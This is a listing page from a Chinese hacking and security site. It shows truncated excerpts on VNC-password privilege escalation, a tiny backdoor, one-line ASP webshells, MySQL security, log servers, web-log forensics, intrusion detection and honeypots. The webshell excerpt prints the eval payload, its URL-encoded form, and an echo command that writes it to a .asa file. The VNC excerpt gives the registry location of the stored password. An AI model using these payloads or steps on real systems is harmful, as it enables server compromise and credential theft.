系统提权方法大汇总

No.10 Vnc
Vnc不少老外都在用,国内用的比较少,但是几率很大。

==============
VNC提权方法
==============
利用shell读取vnc保存在注册表中的密文,使用工具VNC4X破解
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
69 45
150 96
177 b1
...

标签:

浅谈虚拟社区安全bug的发现及利用

本文已经发表在《黑客手册》上。

作者:烟台 王岗(www.5iadmin.com

现在网络上的论坛和社区有很多,论坛绝大多数使用的是一些可以免费下载代码并使用的论坛,研究这些代码的人很多,所以关于这方面的安全文章有很多,这里就不做介绍,本文着重介绍一些虚拟社区的安全Bug的发现和利用方法,因为都是些大网站自己开发的社区,为了避免造成不良影响,这里就不抓图和详细说了,只以A,B表示,请大家不要对号入座,因为我做了一些处理^_^。

...

标签:

MySQL安全攻防实战指南之体系结构篇

一、MySQL支持的机器体系结构

MySQL自称是当今世界上最流行的开源数据库,并且是免费发行,同时还能运行在各种平台之上——这也正是黑客们对它趋之若鹜的原因。与其它大型数据库相比较而言,它的配置工作要容易、简单得多,并且性能也说的过去。尽管它的用法相对来说简单一些,但是在安全配置方面还是有大量的工作要做的,这也是许多数据库存在安全隐患的原因之一。

一般情况下,人们都是通过二进制文件程序包来安装MySQL数据库服务器,这时它可以安装到如下所示的系统:Linux x86、Linux IA64、Linux AMD64、Windows、Solaris、FreeBSD、Mac OS X、HP-UX、IBM AIX、QNX、Novell Netware、OpenBSD、SGI IRIX、DEC OSF;如果从源代码进行安装的话,那么它能支持的平台还要多。

...

标签:

小体积后门程序

1kb正向连接零管道后门代码
说明:  
不用我多说了吧..黑客一般都会使用的后门程序..  
这里只是简单的演示一下..没有添加进程隐藏功能  
程序可以在Win9x,Win2k,WinXP,Win2k3上使用  
程序体积只有1k(FSG压缩一下会更小)  
测试:  
本地开启NetCat等工具,连接远程计算机80端口,会得到一个Shell  
...

标签:

有关一句话后门

来源:安天团队

收集:X.DW

一般来说就是针对有输入接口的地方插入一句话后门
如下面所示:
(1)<%eval request("#")%>
(2)转换后的代码%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%23%22%29%25%3E   63字节
(3)通过echo命令 echo ^<^%eval request(chr(35))%^> >d:\hack.asa
...

标签:

如何设定安全log服务器呢(RedHat)

*环境 RedHat 7.3 在网上越来越多的 hacker 的出现, 越来越多的高手出现的情况下.如何才能确保自己可以保存一份完整的 log 呢?稍微有点概念的 hacker 都知道,进入系统后的第一见事情就是去清理log, 而发现入侵的最简单最直接的方法就是去看系统纪录文件.现在我们来说说如何设定一个安全的log服务器. 想想看,如果入侵者无法连接服务器,又如何能改您的 log 呢?现在我们来

标签:

根据Web服务器记录来追击黑客

现今的网络,安全越来越受到大家的重视,在构建网络安全环境时,在技术手段,管理制度等方面都逐步加强,设置防火墙,安装入侵检测系统等等。但网络安全是个全方位的问题,忽略哪一点都会造成木桶效应,使得整个安全系统虚设。本文从分析Web服务器的logging记录来找出漏洞,防范攻击,从而加强Web服务器安全。

Web服务是Internet所提供最多,最丰富的服务,各种Web服务器自然也是受到攻击最多的,我们采用了很多措施来防止遭受攻击和入侵,其中查看Web服务器的记录是最直接,最常用,又比较有效的一种方法,但logging记录很庞大,查看logging记录是很繁琐的事情,如果抓不住重点,攻击线索就容易被忽略。下面就对最流行的两类Web服务器:Apache和IIS做攻击的实验,然后在众多的记录中查到攻击的蛛丝马迹,从而采取适当的措施加强防范。

...

标签:

黑客攻击特征分析与反攻击技术

要想更好的保护网络不受黑客的攻击,就必须对黑客的攻击方法、攻击原理、攻击过程有深入的、详细的了解,只有这样才能更有效、更具有针对性的进行主动防护。下面通过对黑客攻击方法的特征分析,来研究如何对黑客攻击行为进行检测与防御。

  一、反攻击技术的核心问题

  反攻击技术(入侵检测技术)的核心问题是如何截获所有的网络信息。目前主要是通过两种途径来获取信息,一种是通过网络侦听的途径(如Sniffer,Vpacket等程序)来获取所有的网络信息(数据包信息,网络流量信息、网络状态信息、网络管理信息等),这既是黑客进行攻击的必然途径,也是进行反攻击的必要途径;另一种是通过对操作系统和应用程序的系统日志进行分析,来发现入侵行为和系统潜在的安全漏洞。

...

标签:

黑客的致命诱惑 蜜罐程序

信息来源:特络纳

虽然自己电脑有防火墙,但你有没有想过,黑客到底想再你的电脑干些什么?想不想下个圈套来诱捕黑客?

一,什么是"蜜罐"

大家小时候应该听过大人给我讲的狗熊偷蜜的故事吧?要了解电脑安全方面的蜜罐,就得知道两个东西Honeypot和Honeynet.

Honeypot是一种故意存在着缺陷的虚拟系统,用来对黑客进行欺骗,Honeynet是一个很有价值的学习工具,她能使我们了解黑客的入侵的攻击方式.现在知道蜜罐的含义了吧?她是指能吧黑客从你的真是系统中引诱开的诱骗系统,这种系统看起来充满了真实有用的东西,担其实都是为黑客布好的陷阱,说直接的话,就是一个包涵漏洞的系统,她模拟一个或者多个易受攻击的主机给黑客提供易受攻击的目标,让黑客误以为入侵成功,可以为所欲为了.蜜罐主要是用来套住黑客,以便网络保安系统和人员能够将之抓住.

...

标签:

网络安全技术问题探讨

网络安全是指计算机网络系统中的硬件、数据、程序等不会因为无意或恶意的原因而遭到破坏、篡改、泄露,防止非授权的使用或访问,系统能够保持服务的连续性,以及能够可靠的运行。网络安全的具体概念会随着感兴趣角度的不同而不同。
一、网络安全保护技术
1、被动的安全保护技术
目前在网络安全中,被动的安全保护技术主要有物理保护和安全管理、入侵、检测、防火墙、口令验证、审计跟踪、安全扫描器等。下面对它们进行分别介绍。
物理保护和安全管理:它是指制定管理方法和规则对网络中的物理实体和信息系统进行规范管理,从而减少人为因素所带来的不利影响。入侵检测:它是指在网络系统的检查位置执行入侵检测功能的程序,从而可以对系统当前的运行状况和资源进行监控,发现可能的入侵行为。防火墙:它是指在Internet和组织内部网之间实现安全策略的访问控制保护,它的核心思想是采用包过滤技术。口令验证:它是指利用密码检测器的口令验证程序检查口令中的薄弱口令,
...

标签: